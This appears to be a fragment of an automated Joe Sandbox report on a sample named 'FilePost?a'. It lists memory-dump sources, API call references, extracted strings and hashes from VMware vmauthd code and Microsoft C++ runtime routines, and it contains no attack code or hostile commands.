                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Warning$ErrorLast$CloseHandleObjectSingleWait_printffree
                                          • String ID: %s(): reading from closed socket.$%s: read failed. Closing socket for reading.$Buffer full. Disconnecting.$Data not in UTF-8 format$Input incorrectly terminated.$Input incorrectly terminated.$Input not in UTF-8 encoding.$Input too large.$Line is not in UTF-8. Disconnecting$Line missing \r$Overflowed buffer$Read a \n without a corresponding \r. Disconnecting.$Short response (%d). Disconnecting.$UTF-8$VMAuthdSocketRead$recv timed-out waiting for data on connection. aborting.$recv() FAIL: %d.
                                          • API String ID: 974896413-2831141954
                                          • Opcode ID: 3b8ea02432f3bb318d5d2f5db5a90218a8ab7c6149e29c24b7d4265d0e26ca78
                                          • Instruction ID: ef9a3fe3f9b71f6d91ba4adcc12bd41206b971489ba9a99553810705c52c9906
                                          • Opcode Fuzzy Hash: 3b8ea02432f3bb318d5d2f5db5a90218a8ab7c6149e29c24b7d4265d0e26ca78
                                          • Instruction Fuzzy Hash: E9610674A40305ABDB23AB759C42BEAFBE4EF01710F004159F955AF2C3DBB0BA0497A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
                                          • String ID: Y9n
                                          • API String ID: 1186856153-484334328
                                          • Opcode ID: d082c35e1da6cec6dff5b031ef539f4af2abfa100b95e14fe00b7744ae34bde0
                                          • Instruction ID: bb682cd90fd9264e580d092e03c380238b289f289daa73937d353ed76237a0c0
                                          • Opcode Fuzzy Hash: d082c35e1da6cec6dff5b031ef539f4af2abfa100b95e14fe00b7744ae34bde0
                                          • Instruction Fuzzy Hash: 08C171B5D00209AFCB04DFE8C895AEE77BDEF49304F10055EE552AB284FB359A44EB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Warning.VMWAREBASE(received %s command: %s,?,?), ref: 00341A5E
                                          • Warning.VMWAREBASE(?,?,0034A6D8), ref: 00341A7A
                                          • Warning.VMWAREBASE(00000000,?), ref: 00341A93
                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004), ref: 00341AD1
                                          • Warning.VMWAREBASE(00000025,?,?,00000000), ref: 00341B10
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341B30
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00000000), ref: 00341B78
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341C58
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341C6D
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341C95
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341C9C
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341CAB
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00341CC1
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00341CD6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: free$Warning$calloc
                                          • String ID: Command '%s' not authorized for specified VM$Command '%s' not authorized to access the specific VM socket$Invalid arguments to '%s%s'$MEM_ALLOC %s:%d$P<kv$bora\apps\vmauthd\vmauthd.c$received %s command: %s
                                          • API String ID: 153094251-1093210316
                                          • Opcode ID: d1fd85cac5199552d9d609724a45a5e7f8ee0d483e5c0aaa971efd87a704210d
                                          • Instruction ID: e5236eba5761db3489a08e34883cdeff6dae0d7576ce46fbf16e9c479df0f11f
                                          • Opcode Fuzzy Hash: d1fd85cac5199552d9d609724a45a5e7f8ee0d483e5c0aaa971efd87a704210d
                                          • Instruction Fuzzy Hash: 2391A171A40605ABDB129FA4CD85BFFBBF9EF05304F040059E905AF241E736AE51CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::operator+.LIBCMT ref: 6E39DAB3
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DABE
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DBB2
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DBCF
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DBEC
                                          • DName::operator+.LIBCMT ref: 6E39DC01
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 6E39DC1B
                                          • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000010,00000002,00000000,0000002C,00000000,0000007B,00000000,?,00000000), ref: 6E39DC3C
                                          • swprintf.LIBCMT ref: 6E39DC96
                                          • DName::operator+.LIBCMT ref: 6E39DCF1
                                            • Part of subcall function 6E399A8F: DName::DName.LIBVCRUNTIME ref: 6E399AED
                                          • DName::DName.LIBVCRUNTIME ref: 6E39DD68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$atolswprintf
                                          • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr$|+uyo
                                          • API String ID: 2378214352-3803870015
                                          • Opcode ID: 9b1b5b8646b7f292f7e3413a5bbac37aa492e5bc77c28d79fe51d96ba8b84ea9
                                          • Instruction ID: 6bba9d8abb829dc216b431c44b907b66af27f8be743577157b99026b73f0d638
                                          • Opcode Fuzzy Hash: 9b1b5b8646b7f292f7e3413a5bbac37aa492e5bc77c28d79fe51d96ba8b84ea9
                                          • Instruction Fuzzy Hash: 1FA1BAB1D0820A9EDB04DFF8D996AEF77BCAF05304F904516D151AB190FB759A08EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
                                          • String ID:
                                          • API String ID: 1186856153-0
                                          • Opcode ID: 864fc39a688989fb6838284919b4cd78dd767a94c42bfa373e5b7e571149d0da
                                          • Instruction ID: 6d37c83f00446e8f057b3f2ff2ed168e2edd2d4c8e05ecec8d1b2b15ba2d2f22
                                          • Opcode Fuzzy Hash: 864fc39a688989fb6838284919b4cd78dd767a94c42bfa373e5b7e571149d0da
                                          • Instruction Fuzzy Hash: 46C1C472944249AFCF04CFA8C891EED7BB8FF19304F11405AE625E7298EBB49955CB70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::operator+.LIBCMT ref: 6E39CF50
                                          • DName::operator+.LIBCMT ref: 6E39D093
                                            • Part of subcall function 6E398B63: shared_ptr.LIBCMT ref: 6E398B7F
                                          • DName::operator+.LIBCMT ref: 6E39D0DF
                                          • DName::operator+.LIBCMT ref: 6E39D0EE
                                          • DName::operator+.LIBCMT ref: 6E39D03E
                                            • Part of subcall function 6E39E791: DName::operator=.LIBVCRUNTIME ref: 6E39E820
                                          • DName::operator+.LIBCMT ref: 6E39D21A
                                          • DName::operator=.LIBVCRUNTIME ref: 6E39D25A
                                          • DName::DName.LIBVCRUNTIME ref: 6E39D272
                                          • DName::operator+.LIBCMT ref: 6E39D281
                                          • DName::operator+.LIBCMT ref: 6E39D28D
                                            • Part of subcall function 6E39E791: Replicator::operator[].LIBCMT ref: 6E39E7CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
                                          • String ID: `anonymous namespace'
                                          • API String ID: 1026175760-3062148218
                                          • Opcode ID: c7a82b4cbb7355098a1a91bfa12687bf8d45f42707cb7aeab21ba11a8510550e
                                          • Instruction ID: 4afdba3d91a69f0e45086a71e917140fdd9c3249da47255ef85e406c6bf7e7b1
                                          • Opcode Fuzzy Hash: c7a82b4cbb7355098a1a91bfa12687bf8d45f42707cb7aeab21ba11a8510550e
                                          • Instruction Fuzzy Hash: ACC15BB19042099FDB14CFE8C855BEEBBF9BF49304F504859E196AB280FB759A48DF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Warning.VMWAREBASE(00000002,00000000,?,00000000,?,00346AB7,00000000,00000000,00000000,?,00000000), ref: 003465D9
                                          • wcschr.VCRUNTIME140(00000000,0000003D,00000000), ref: 00346624
                                          • wcschr.VCRUNTIME140(00000000,0000003D,?,?,?,?,?,?,?,00000000), ref: 0034664B
                                          • CompareStringOrdinal.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 00346672
                                          • CompareStringOrdinal.KERNEL32(00000000,000000FF,00000000,?,00000001,?,?,?,?,?,00000000), ref: 003466CD
                                          • memcpy.VCRUNTIME140(00000000,00000000,-00000001,?,?,00000000), ref: 0034676B
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000), ref: 003467D6
                                            • Part of subcall function 003427C0: GetLastError.KERNEL32(?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427D8
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427F3
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,0034A850,?,?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00342807
                                            • Part of subcall function 003427C0: _printf.MSPDB140-MSVCRT ref: 00342824
                                            • Part of subcall function 003427C0: SetLastError.KERNEL32(00000000,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0034282D
                                          Strings
                                          • The system environment block is too long. Please fix your environment block and try again., xrefs: 00346556
                                          • The system environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again., xrefs: 0034678D
                                          • P<kv, xrefs: 003467D6
                                          • Failed comparing system vs user environment keys: %S vs %S. Please fix the environment blocks and try again., xrefs: 00346796
                                          • Your environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again., xrefs: 003467BF
                                          • Failed comparing a key against user environment keys: %S vs %S. Please fix your environment block and try again., xrefs: 003467AB
                                          • The child environment block is too long. Please fix your environment block and try again., xrefs: 003465AE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Warning$CompareErrorLastOrdinalStringwcschr$_printffreememcpy
                                          • String ID: Failed comparing a key against user environment keys: %S vs %S. Please fix your environment block and try again.$Failed comparing system vs user environment keys: %S vs %S. Please fix the environment blocks and try again.$P<kv$The child environment block is too long. Please fix your environment block and try again.$The system environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again.$The system environment block is too long. Please fix your environment block and try again.$Your environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again.
                                          • API String ID: 1816562336-453551589
                                          • Opcode ID: 9d1ca9cd4237b59cce8c772c22525de413bfab5d3bee842d7ad5f11e7f9f8f8b
                                          • Instruction ID: a05c96709d46d61f2a6b5b18933585176e32444181b2e831cae604ed853113cf
                                          • Opcode Fuzzy Hash: 9d1ca9cd4237b59cce8c772c22525de413bfab5d3bee842d7ad5f11e7f9f8f8b
                                          • Instruction Fuzzy Hash: 0C91D335E002159BCF26DF68C8526BEBBF5EF46704F1A4199E806AF280E7717E41C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Replicator::operator[].LIBCMT ref: 6E39E7CE
                                          • DName::operator=.LIBVCRUNTIME ref: 6E39E820
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator=Replicator::operator[]
                                          • String ID: @$Y9n$`generic-type-$`template-parameter-$generic-type-$template-parameter-$|+uyo
                                          • API String ID: 3211817929-4006326660
                                          • Opcode ID: be9d163f1d2af8d23e071de9002245dd2624defd574913165ea688e2fea22d81
                                          • Instruction ID: db13c2403e10399a9a44de86d3a048db615d428495891dc1c3430cb2e03225ab
                                          • Opcode Fuzzy Hash: be9d163f1d2af8d23e071de9002245dd2624defd574913165ea688e2fea22d81
                                          • Instruction Fuzzy Hash: 6461D1B1D042099FDB04CFEAC840BEEBBFDBF09300F50441AE655A7290EB349949DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID:
                                          • API String ID: 2509303402-0
                                          • Opcode ID: 847c0e8cdc6379c1934ba2e7f3cf5be87c9625b87d42e03de7b63ecb5b4ddd50
                                          • Instruction ID: aeb85880c2199b1639a5db5ebd46f862caefdae3c7e63607d2659db15a674294
                                          • Opcode Fuzzy Hash: 847c0e8cdc6379c1934ba2e7f3cf5be87c9625b87d42e03de7b63ecb5b4ddd50
                                          • Instruction Fuzzy Hash: 6ED1B071D0424A9FDB21CFB4C880BEEBBF5FF19304F10406AE995A7265DBB1A845CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Warning.VMWAREBASE(?,00000000), ref: 00342625
                                          • Warning.VMWAREBASE(00000000,vmware,?,00000000), ref: 00342632
                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,vmware,?,00000000), ref: 00342638
                                          • Warning.VMWAREBASE ref: 0034263E
                                          • Warning.VMWAREBASE(?), ref: 00342647
                                          • Warning.VMWAREBASE(?,?), ref: 00342665
                                          • Warning.VMWAREBASE(00000001,authd.policy.allowRCForRead,?,?), ref: 00342671
                                          • Warning.VMWAREBASE(0000005A,vmauthd.startupTimeout,00000001,authd.policy.allowRCForRead,?,?), ref: 00342682
                                          • Warning.VMWAREBASE(?,0000005A,vmauthd.startupTimeout,00000001,authd.policy.allowRCForRead,?,?), ref: 0034268D
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,?,00000000,00000000,?,0034269A), ref: 00342864
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,?,00000000,00000000,?,0034269A), ref: 00342871
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,0034269A), ref: 00342887
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000003,log.syslogMinLevel,00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,0034269A), ref: 00342894
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 0034289C
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 003428A3
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 003428A9
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 003428AF
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 003428B5
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0034269A), ref: 003428BB
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 003428C7
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 003428D2
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,00000000,vmauthd.log.fileName,?,?,00000000,00000000,?,0034269A), ref: 003428E7
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0034269A), ref: 003428F6
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0034269A), ref: 00342910
                                            • Part of subcall function 00342850: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0034269A), ref: 00342918
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 0034292B
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00342939
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00342949
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00342956
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,00000003,log.logMinLevel,00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?), ref: 00342963
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 0034296B
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00342972
                                            • Part of subcall function 00342850: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 00342978
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp
                                          • Associated: 00000003.00000002.4089031269.0000000000352000.00000002.00000001.01000000.00000008.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_340000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Warning$free
                                          • String ID: P<kv$authd.policy.allowRCForRead$vmauthd.startupTimeout$vmware
                                          • API String ID: 2642810717-554617529
                                          • Opcode ID: 100daa8a5af59919f889ed780377bc0c14a5f17ca0825b8a14d026824372944f
                                          • Instruction ID: aeece54dca900ab939ac0dd925bbcc15bb8a210144894899466623f445b432dc
                                          • Opcode Fuzzy Hash: 100daa8a5af59919f889ed780377bc0c14a5f17ca0825b8a14d026824372944f
                                          • Instruction Fuzzy Hash: AF015E34941208AACB03FFA5DC46ADFBBF8AF02701F400116F804AF2A2DB7479468796
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • type_info::operator==.LIBVCRUNTIME ref: 6E3967B3
                                          • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0(19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000,?,?,?), ref: 6E3967CE
                                          • ___TypeMatch.LIBVCRUNTIME ref: 6E3968C1
                                          • __DestructExceptionObject.VCRUNTIME140(?,00000001,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000,?,?,?), ref: 6E396945
                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000,?,?,?), ref: 6E3969CC
                                          • __DestructExceptionObject.VCRUNTIME140(?,00000001,#9n,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000,?,?,?), ref: 6E3969DA
                                          • _CxxThrowException.VCRUNTIME140(?,6E39FB64,#9n,19930522,00000000,1FFFFFFF,6E396CF0,?,?,00000000,00000000,00000000,?,?,?), ref: 6E3969F2
                                          • _UnwindNestedFrames.LIBCMT ref: 6E396A13
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Exception$DestructObject$FramesMatchNestedThrowTypeUnwindabortterminatetype_info::operator==
                                          • String ID: csm$csm$csm$#9n
                                          • API String ID: 1953119474-1570539047
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DName::operator+.LIBCMT ref: 6E39B382
                                            • Part of subcall function 6E398B41: DName::operator+=.LIBCMT ref: 6E398B57
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+Name::operator+=
                                          • String ID: (!9n$`unknown ecsu'$class $coclass $cointerface $enum $h!9n(!9n$struct $union
                                          • API String ID: 382699925-3511251873
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(6D1CB368,00000FA0,?,?,6D167CF4), ref: 6D167D22
                                          • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,6D167CF4), ref: 6D167D2D
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6D167CF4), ref: 6D167D3E
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 6D167D50
                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 6D167D5E
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,6D167CF4), ref: 6D167D81
                                          • DeleteCriticalSection.KERNEL32(6D1CB368,00000007,?,?,6D167CF4), ref: 6D167D9D
                                          • CloseHandle.KERNEL32(00000000,?,?,6D167CF4), ref: 6D167DAD
                                          Strings
                                          • SleepConditionVariableCS, xrefs: 6D167D4A
                                          • kernel32.dll, xrefs: 6D167D39
                                          • WakeAllConditionVariable, xrefs: 6D167D56
                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 6D167D28
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
